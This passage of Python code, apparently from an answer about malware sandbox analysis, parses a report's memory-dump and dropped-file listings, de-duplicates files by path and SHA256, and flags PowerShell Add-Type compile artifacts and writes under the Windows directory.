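_MEM = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-(?:0x([0-9A-Fa-f]+)-memory|mapping)\.dmp$")
_HASH = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$")


def normalize_path(path):
    """Drop the NT object-manager prefix so \\??\\c:\\x and C:\\x compare equal."""
    return path[4:] if path.startswith("\\??\\") else path


def parse_files_section(text):
    """Split the flat list into memory regions and de-duplicated dropped files."""
    regions, dropped, current = [], [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = _MEM.match(line)
        if m:
            end = int(m.group(4), 16) if m.group(4) else None  # None: mapping entry
            regions.append({"pid": int(m.group(1)), "start": int(m.group(3), 16), "end": end})
            current = None
            continue
        m = _HASH.match(line)
        if m and current is not None:
            current[m.group(1).lower()] = m.group(2)
            continue
        current = {"path": normalize_path(line)}
        dropped.append(current)
    unique, seen = [], set()  # the report repeats a file once per writing process
    for entry in dropped:
        key = (entry["path"].lower(), entry.get("sha256"))
        if key not in seen:
            seen.add(key)
            unique.append(entry)
    return regions, unique


def add_type_artifacts(dropped):
    """Compile units with the Add-Type/csc.exe footprint: <name>.cmdline plus
    <name>.0.cs and <name>.dll in the same directory."""
    by_dir = {}
    for entry in dropped:
        directory, _, name = entry["path"].lower().rpartition("\\")
        by_dir.setdefault(directory, set()).add(name)
    found = []
    for names in by_dir.values():
        for name in names:
            if name.endswith(".cmdline"):
                stem = name[: -len(".cmdline")]
                if {stem + ".0.cs", stem + ".dll"} <= names:
                    found.append(stem)
    return sorted(found)


def system_location_writes(dropped):
    """Files written under the Windows directory rather than a user profile."""
    out = []
    for entry in dropped:
        path = re.sub(r"^[a-z]:", "", entry["path"].lower())  # some entries lack a drive
        if path.startswith("\\windows\\"):
            out.append(entry["path"])
    return out


if __name__ == "__main__":
    regions, dropped = parse_files_section(FILES_TEXT)
    print("pids with dumps:", sorted({r["pid"] for r in regions}))
    print("add-type compile units:", add_type_artifacts(dropped))
    for path in system_location_writes(dropped):
        print("system write:", path)
```

The de-duplication key is path plus SHA256, so a path rewritten with different content would still be reported twice, which is the behaviour you want when a dropper overwrites its own stage.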